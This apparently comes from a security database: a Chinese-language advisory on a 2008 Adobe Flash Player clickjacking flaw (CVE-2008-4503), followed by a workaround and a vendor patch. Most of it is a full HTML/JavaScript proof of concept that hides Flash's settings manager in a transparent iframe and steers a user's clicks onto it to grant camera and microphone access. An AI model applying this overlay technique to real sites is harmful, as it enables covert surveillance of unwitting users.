Adobe Flash Player点击劫持漏洞
发布日期:2008-10-07
更新日期:2008-10-09
受影响系统:
Adobe Flash Player 9.0.124.0
描述:
BUGTRAQ ID: 31625
CVE(CAN) ID: CVE-2008-4503
Flash Player是一款非常流行的FLASH播放器。
Adobe Flash Player的设置管理器受点击劫持(Clickjack)漏洞的影响。恶意网页可以把设置管理器页面嵌入一个透明的iframe,并在其上方叠加伪装的可见内容;如果用户受骗访问了这样的网页并点击了伪装的对话框,其点击实际上会作用于设置管理器,从而可能允许攻击者在用户不知情的情况下访问摄像头或麦克风。
<*来源:Robert Hansen
链接:http://secunia.com/advisories/32163/
http://blog.guya.net/2008/10/07/malicious-camera-spying-using-clickjacking/
http://www.adobe.com/support/security/advisories/apsa08-08.html
https://www.redhat.com/support/errata/RHSA-2008-0945.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<title>Camera ClickJacking - The Game</title>
<head>
<style type="text/css">
/* The framed page (the iframe with id "frm") is rendered fully transparent.
   "filter" is the legacy Internet Explorer form of the same setting. */
#frm
{
opacity:0;
filter:alpha(opacity=0);
}
/* The visible "click" image: absolutely positioned so script can move it,
   drawn at z-index 10. */
.click
{
cursor:pointer;
position:absolute;
z-index:10;
width:100px;
}
/* Title text on the intro panel. */
.header
{
font:bold 28px Arial;
color:#CC0000;
}
/* Page-wide font defaults. */
body
{
font-family:Arial;
line-height:1.2em;
}
</style>
<script type="text/javascript">
// Scripted steps of the demo, consumed in order by next(). For each entry:
//   cx, cy - page position in px that the "click" image is moved to
//   d      - time in ms during which further scripted steps are held back
//   a      - optional name of the action() that runs on the following move
// NOTE(review): the fixed coordinates presumably line up with controls in the
// framed page; that cannot be confirmed from this listing alone.
jack = [{ d: 1, cx: 575, cy: 430 }, { d: 1, a: "loadAndReload", cx: 368, cy: 428 }, { d: 300, cx: 364, cy: 474 }, { d: 300, a: "reloadAndLoad", cx: 299, cy: 409}];
//jack[n].d -> delay next jacking
// NOTE(review): every name below is assigned without var/let, so each one is an
// implicit global; the script would throw in strict mode.
// Shorthand for the document object.
$d = document;
// DOM handles (filled in by initGame()) and the action queued by next().
clk = block = scr = tmr = lastAction = null;
// True while the hold-back period (jack[n].d) after a scripted step is running.
delayed = false;
// Elapsed time in ms, advanced by timmer().
mill = 0;
// Number of moves that must be random before the first scripted step is used.
startMoves = 6;
// Starts (or restarts) a round: shows the moving "click" image, hides the intro
// panel, caches the DOM nodes the other functions use, and resets the step and
// move counters.
function initGame() {
clk = $d.getElementById("click");
clk.style.display = "";
intr = $d.getElementById("intro");
intr.style.display = "none";
block = $d.getElementById("block");
scr = $d.getElementById("score");
tmr = $d.getElementById("timmer");
curr = moves = 0;
// The third scripted step (jack[2]) stays blocked until action("reloadFrm")
// clears this flag.
jack[2].wait = true;
next();
resetButton();
// Start the 90 ms clock only once, even when next() calls initGame() again.
if ("undefined" == typeof tInter) tInter = setInterval(timmer, 90);
}
// Advances the game by one move: runs the action queued by the previous scripted
// step, places the "click" image either at a random spot or at the next scripted
// position from jack[], and increments the score.
function next() {
// All scripted steps have been used: start over.
if (curr >= jack.length) {
initGame();
return;
}
var x, y;
// 0 or 1; a 1 postpones the scripted step for this move.
var b = getRnd(0, 1);
//alert("lastAction: " + lastAction);
action(lastAction);
lastAction = null;
var j = jack[curr];
// Use a random position while the step is blocked, a hold-back period is
// running, the random flag says so, or fewer than startMoves moves were made.
if (j.wait || delayed || b || moves < startMoves) {
x = getRnd(120, 430);
y = getRnd(140, 400);
} else {
// Scripted step: fixed position, queue its action for the next call, and hold
// back further scripted steps for j.d ms.
x = j.cx;
y = j.cy;
lastAction = j.a;
curr++;
delayed = true;
setTimeout(function() { delayed = false; }, j.d);
}
moves++;
pos(x, y);
// Re-arms mouseOver() for the new position.
jacking = false;
score();
}
// Places the "click" image so that its top-left corner is at (x, y), in pixels.
function pos(x, y) {
  var imageStyle = clk.style;
  imageStyle.top = y + "px";
  imageStyle.left = x + "px";
}
// onmouseover handler of the "click" image. It only acts once per move, after
// at least one scripted step has been used, and only when the image sits exactly
// on the position of the most recent scripted step (jack[curr-1]).
function mouseOver() {
if (!jacking && curr && parseInt(clk.style.left) == jack[curr-1].cx && parseInt(clk.style.top) == jack[curr-1].cy) {
jacking = true;
// Both the image and the transparent cover div are moved to negative z-indexes.
// NOTE(review): presumably this lets the user's click land on the invisible
// framed page instead of the visible image - confirm against the markup.
clk.style.zIndex = -10;
block.style.zIndex = -2;
// Run btnClick() after 500 ms whether or not the image itself gets a click.
setTimeout(btnClick, 500);
}
}
// onclick handler of the "click" image, also called on a timer by mouseOver().
// Starts the 20 ms press animation unless one is already in progress.
function btnClick() {
  var animationRunning = animCount > 0;
  if (!animationRunning) {
    inter = setInterval(anim, 20);
    animCount = 0;
  }
}
// Restores the "click" image and the cover div to their resting state: default
// width, fully opaque, back on top of the layers, animation counter cleared.
function resetButton() {
  var imageStyle = clk.style;
  animCount = 0;
  block.style.zIndex = 2;
  imageStyle.zIndex = 10;
  // Legacy Internet Explorer form of "fully opaque".
  imageStyle.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=100);";
  imageStyle.opacity = 1;
  // Assigned as a bare number, exactly as the page does.
  imageStyle.width = 100;
}
// Runs the side effect named by s. A null or unknown name matches no case and
// does nothing.
function action(s) {
switch (s) {
case "loadSWF":
// Writes an <embed> for the Flash movie ClickJacking.swf into the #camera div.
// The markup is a fixed string, so no external input reaches innerHTML here.
// (The var re-declares the parameter s; the switch value is already evaluated.)
var s = '<embed wmode="transparent" width="320" height="240" align="middle" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer" name="ClickJacking" quality="high" id="ClickJacking" src="ClickJacking.swf?131"/>';
var div = $d.getElementById("camera");
div.innerHTML = s;
break;
case "reloadFrm":
// Reloads the hidden iframe by re-assigning its URL without any query string.
var frm = $d.getElementById("frm");
frm.src = frm.src.split('?')[0]; //+ "?r+" +getRnd(0, 1000000);
// Once two scripted steps have been used, unblock the third (jack[2]) after 5 s.
if(curr == 2)
setTimeout(function() { jack[2].wait = false; }, 5000);
break;
case "loadAndReload":
// Load the movie now, reload the iframe one second later.
action("loadSWF");
setTimeout(function(){ action("reloadFrm");}, 1000 );
break;
case "reloadAndLoad":
// Reload the iframe now, load the movie four seconds later.
action("reloadFrm");
setTimeout(function() { action("loadSWF"); }, 4000);
break;
}
}
// One frame of the press animation, run every 20 ms by btnClick(): widens and
// fades the "click" image. After ten frames it stops the interval, advances the
// game with next() and restores the image with resetButton().
function anim() {
if (animCount > 9) {
clearInterval(inter);
next();
resetButton();
return;
}
clk.style.width = (parseInt(clk.style.width) + 5) + "px";
// Relies on the style value being coerced to a number for the subtraction.
clk.style.opacity -= 0.1;
// Legacy Internet Explorer form of the same fade, in percent.
clk.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + ((10 - animCount) * 10) + ");";
animCount++;
}
// Returns a random integer between min and max, both inclusive. Because the
// value is rounded to the nearest integer, the two end points come up about
// half as often as the values in between.
function getRnd(min, max) {
  var span = max - min;
  var scaled = Math.random() * span + min;
  return Math.round(scaled);
}
// Adds one to the number shown in the score label. The current value is parsed
// from the label text after its first six characters.
function score() {
  var shown = scr.innerHTML.substring(6);
  var points = parseInt(shown) + 1;
  scr.innerHTML = "Score: " + points;
}
// Clock tick, run every 90 ms: advances the elapsed time and redraws the time
// label as seconds, with the decimal point replaced by a colon.
function timmer() {
  mill = mill + 90;
  var seconds = mill / 1000;
  tmr.innerHTML = "Time: " + String(seconds).replace(".", ":");
}
// Tells the visitor that no camera was found. Nothing in this script calls it.
// NOTE(review): presumably invoked by the embedded movie - confirm.
function noCam() {
  var message = "no camera is connected, you'd better watch the captured demo";
  alert(message);
}
// Ends the round: moves the #camera div into view above the other layers, stops
// the clock and hides the "click" image. Nothing in this script calls it.
// NOTE(review): presumably invoked by the embedded movie - confirm.
function camJacked() {
  var cameraStyle = $d.getElementById("camera").style;
  cameraStyle.left = "190px";
  cameraStyle.top = "145px";
  cameraStyle.zIndex = 100;
  clearInterval(tInter);
  clk.style.display = "none";
}
// onclick handler of the "Show the jacked IFrame" checkbox (called with the
// checkbox as this). Checked: the hidden frame becomes 30% visible so the viewer
// can see what lies under the game; unchecked: fully transparent again.
function showHide() {
  var frameStyle = $d.getElementById("frm").style;
  var reveal = this.checked;
  frameStyle.opacity = reveal ? "0.3" : "0";
  // Legacy Internet Explorer form of the same opacity, in percent.
  var percent = reveal ? "30" : "0";
  frameStyle.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + percent + ");";
}
</script>
</head>
<body">
<!-- NOTE(review): the opening tag above carries a stray quote character; HTML parsers normally recover from it. -->
<!--<iframe id="frm" height="545" width="680" scrolling="no" src="http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html?defaultTab=privacy"></iframe>-->
<!-- Third-party page loaded in a frame; the #frm style rule renders it at opacity 0, so the visitor cannot see it.
     Defensive note: the overlay depends on the framed page agreeing to render inside another site's frame;
     pages that expose sensitive controls can refuse that with X-Frame-Options or CSP frame-ancestors. -->
<iframe id="frm" height="545" width="680" scrolling="no" src="http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html"></iframe>
<!-- Author's later notice that the demo no longer works. -->
<div style="position:absolute;top:10px;left:10px;z-index:200;"><b>Update:</b> This demo isn't functional anymore, you can still <a href="http://www.youtube.com/watch?v=gxyLbpldmuU" target="_blank">watch the video</a></div>
<!-- Transparent cover (z-index 2) laid over the frame area; mouseOver() temporarily moves it to z-index -2. -->
<div id="block" style="background:red;position:absolute;z-index:2;top:0;left:0;height:550px;width:700px;opacity:0;filter:alpha(opacity=0);"></div>
<!-- Intro panel; the start image calls initGame(). -->
<div id="intro" style="position:absolute;top:0;left:0;z-index:3;height:400px;width:680px;padding:40px;text-align:center;">
<img src="cam.jpg" /><br />
<span class="header">Camera ClickJacking - The Game</span><br />
<img src="start.png" style="cursor:pointer;padding:10px;" onclick="initGame();" />
</div>
<!-- Score and clock labels updated by score() and timmer(). -->
<div style="position:absolute;z-index:4;top:50px;left:80px;font-family:Arial;"><span id="score">Score: 0</span> <span id="timmer">Time: 00:00</span></div>
<!-- The moving decoy image the visitor is asked to click. -->
<img id="click" class="click" src="click.png" style="display:none;" onmouseover="mouseOver.call(this);" onclick="btnClick();"/>
<!-- Container that action("loadSWF") fills with the Flash movie. -->
<div id="camera" style="width:320px;height:240px;position:absolute;left:0;top:0;z-index:1;"></div>
<!-- The checkbox calls showHide(), which makes the hidden frame partly visible for inspection. -->
<div><input id="showHide" type="checkbox" onclick="showHide.call(this);" /><label for="showHide">Show the jacked IFrame.</label><br />
This game demonstrate how the user's camera and microphone can be spied uppon without her knowing.<br />
You may feel free to try it if you have a webcam connected. This example won't listen or record any of the input.<br />
If you don't have a webcam connected, check out <a href="http://www.youtube.com/watch?v=gxyLbpldmuU" target="_blank">this video</a><br />
For more info: <a href="http://blog.guya.net">blog.guya.net</a><br />
</div>
</body>
</html>
建议:
临时解决方法:
* 如下更改Flash Player设置:
1 访问Adobe Flash Player设置管理器的全局保密性设置面板:http://www.adobe.com/support/documentation/en/flashplayer/help/settings_manager02.html
2 选择“始终拒绝”按钮。
3 在对话框中选择“确认”。更改后,所有网站对摄像头和麦克风的访问请求都会被直接拒绝,不再弹出询问。
厂商补丁:
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2008:0945-01)以及相应补丁:
RHSA-2008:0945-01:Important: flash-plugin security update
链接:https://www.redhat.com/support/errata/RHSA-2008-0945.html
